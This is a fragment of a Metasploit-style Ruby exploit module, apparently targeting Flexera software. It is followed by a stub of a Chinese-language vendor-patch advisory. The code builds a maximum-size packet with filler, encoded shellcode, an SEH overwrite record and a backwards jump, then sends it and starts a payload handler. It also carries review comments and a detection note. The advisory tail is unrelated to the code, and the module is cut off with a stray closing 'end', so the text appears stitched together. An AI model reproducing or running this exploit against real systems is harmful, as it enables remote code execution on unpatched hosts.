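# Drives the retry loop: calls do_exploit until a session is created or the
# configured number of attempts is used up.
#
# Reads datastore['Attempts'] (maximum number of tries) and datastore['Wait']
# (seconds to sleep between tries). Prints one status line per try and a
# single error line when every try failed. Callers do not use a return value.
#
# Fix: the original reported "after #{i} attempts" after the loop, where the
# counter had already been advanced one past the last try, so it overstated
# the count by one; the configured total is reported instead.
def exploit
  attempts = datastore['Attempts']
  attempt = 1
  while attempt <= attempts && !session_created?
    print_status("Attempt #{attempt}/#{attempts} to exploit...")
    do_exploit
    # Pause for datastore['Wait'] seconds before checking for a session again.
    sleep(datastore['Wait'])
    attempt += 1
  end
  print_error("Exploit didn't work after #{attempts} attempts") unless session_created?
end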
# Performs a single try: starts a "jam" thread, builds one maximum-size
# request and sends it over the module's socket.
#
# NOTE(review): the thread handle `t` is never joined or stopped here;
# confirm that `jam` terminates on its own or that module cleanup kills it.
def do_exploit
t = framework.threads.spawn("jam", false) { jam }
my_payload = payload.encoded
header_length = 20 # See create_packet() to understand this number
pkt_data = ""
# Both branches size the body so that body + 20-byte header totals 65535 bytes.
if target.name =~ /Debug/
# Debug target: filler only, no payload.
pkt_data << "a" * (65535 - header_length)
else
# Layout for real targets: filler up to ShellcodeOffset, the encoded payload,
# filler up to Offset, an SEH record pointing at target.ret, a backwards jmp,
# then filler to the maximum size.
pkt_data << "a" * (target['ShellcodeOffset'])
pkt_data << my_payload
# NOTE(review): raises ArgumentError (negative repeat count) if the encoded
# payload is longer than Offset - ShellcodeOffset; the module's payload
# space limit should be bounded accordingly.
pkt_data << "b" * (target['Offset']-target['ShellcodeOffset']-my_payload.length)
pkt_data << generate_seh_record(target.ret)
pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string
pkt_data << "c" * (65535 - pkt_data.length - header_length)
end
# Detection note: a maximum-size request whose body is mostly long runs of a
# single repeated byte is a distinctive traffic pattern for this vector.
pkt = create_packet(pkt_data)
connect
sock.put(pkt)
handler
disconnect
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
Flexera
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: